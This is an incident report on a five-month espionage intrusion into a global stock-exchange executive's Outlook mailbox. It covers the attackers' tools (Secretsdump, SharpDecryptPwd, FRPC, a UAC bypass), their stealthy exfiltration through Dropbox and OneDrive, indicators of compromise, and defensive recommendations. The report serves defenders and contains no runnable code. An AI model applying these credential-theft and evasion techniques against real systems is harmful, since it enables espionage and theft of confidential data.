Full Report
Unknown attackers spent at least five months inside the Outlook mailbox of a senior executive at a major global stock exchange, copying the inbox out in small, repeated batches and routing it through Dropbox and OneDrive so the traffic blended into normal cloud activity. Symantec and Carbon Black's Threat Hunter Team reported the campaign this week. This points to espionage, not a money grab:
Analysis Summary
# Incident Report: Stealthy Espionage of Global Stock Exchange Executive
## Executive Summary
An unidentified threat actor maintained persistent access to a senior executive's Outlook mailbox at a major global stock exchange for over five months. The attackers utilized a custom mailbox extraction tool and leveraged legitimate cloud services (Dropbox/OneDrive) to exfiltrate data in small batches to evade detection. The campaign targeted high-value non-public information, indicating a sophisticated cyber-espionage objective rather than financial theft.
## Incident Details
- **Discovery Date:** Approximately March 2026
- **Incident Date:** October 10, 2025 – March 19, 2026
- **Affected Organization:** Unnamed Major Global Stock Exchange
- **Sector:** Financial Services / Capital Markets
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** Pre-October 10, 2025
- **Vector:** Likely lateral movement from a previously compromised device.
- **Details:** By the first recorded timestamp, attackers already held SYSTEM-level privileges.
### Lateral Movement
- The attacker moved from an initial point of entry to the executive's specific workstation/account. Detailed evidence suggests the use of **FRPC** (Fast Reverse Proxy) for tunneling and **Secretsdump** for credential harvesting to facilitate movement.
### Data Exfiltration/Impact
- **Nov 12, 2025:** Main exfiltration phase began.
- **Nov 2025 – Feb 17, 2026:** Small, repeated batches of mailbox data were stolen every 2-4 weeks.
- **Method:** Used a .NET-based "mailbox stealer" (using Aspose library) to convert Outlook OST/PST files to encrypted PSTs.
- **Volume:** Eight distinct exfiltration events covering data from August 2025 through February 2026.
### Detection & Response
- **Discovery:** Identified by Symantec and Carbon Black's Threat Hunter Team.
- **March 19, 2026:** Final observed activity involved staging a new backdoor, which was never executed, likely due to loss of access or eviction.
## Attack Methodology
- **Initial Access:** Lateral movement from another compromised asset.
- **Persistence:** Scheduled tasks disguised as legitimate services (Adobe, Lenovo, OneDrive).
- **Privilege Escalation:** Utilized a UAC (User Account Control) bypass tool; achieved SYSTEM privileges.
- **Defense Evasion:** Renamed binaries to mimic common software (Adobe/OneDrive); used hard-coded IPs for exfiltration to avoid DNS logs; batched exfiltration to minimize traffic spikes.
- **Credential Access:** Used **Secretsdump** and **SharpDecryptPwd** to pull Windows and application passwords.
- **Discovery:** Local reconnaissance of Outlook data files (OST/PST).
- **Lateral Movement:** FRPC for internal-to-external tunneling.
- **Collection:** Custom tool built on the legitimate **Aspose .NET library** to programmatically read and export mailboxes.
- **Exfiltration:** Routed data through **Dropbox** (via API/curl) and **OneDrive Personal** to blend with normal cloud traffic.
- **Impact:** Focused espionage; unauthorized access to market-moving plans and non-public deal terms.
## Impact Assessment
- **Financial:** No direct "money grab" detected; potential long-term impact via insider trading or market manipulation based on stolen data.
- **Data Breach:** Near-continuous copy of a senior executive’s inbox, including contacts, calendars, and sensitive deal logic.
- **Operational:** Low immediate disruption, as the attacker prioritized stealth.
- **Reputational:** High risk due to the sensitivity of stock exchange data and market integrity.
## Indicators of Compromise
- **Network:** Hard-coded Microsoft IP addresses for OneDrive (bypassing DNS); traffic to `temp[.]sh`.
- **File:** Malicious binaries faking `Adobe Updater` and `OneDrive` executables.
- **Behavioral:**
- Unauthorized use of `curl` for file uploads.
- Large-scale creation of PST files by non-admin processes.
- Scheduled tasks named after hardware vendors (Lenovo/Adobe) triggered at unusual intervals.
## Response Actions
- **Containment:** Likely achieved by March 2026 through the removal of persistent backdoors.
- **Eradication:** Monitoring for FRPC tunneling and credential-dumping signatures.
- **Recovery:** Restoration of secure configurations and credential rotation for all affected privileged accounts.
## Lessons Learned
- **Visibility Gaps:** Relying on DNS logs was insufficient because attackers used hard-coded IPs.
- **Living off the Land:** The use of legitimate libraries (Aspose) and cloud providers (Dropbox) effectively bypasses traditional signature-based detection.
- **Privileged User Monitoring:** High-ranking executives are Tier-0 assets and require specific behavioral monitoring for secondary storage (PST/OST) access.
## Recommendations
- **Endpoint Monitoring:** Implement strict monitoring for any process interacting with Outlook data files (`.ost` and `.pst`) outside of `outlook.exe`.
- **Cloud Egress Control:** Restrict access to personal cloud storage (Dropbox, personal OneDrive) on corporate assets.
- **Identity Security:** Implement Multi-Factor Authentication (MFA) and regularly audit active sessions for high-value targets.
- **Behavioral Analytics:** Set alerts for the execution of proxy/tunneling tools (like FRPC) and credential harvesters.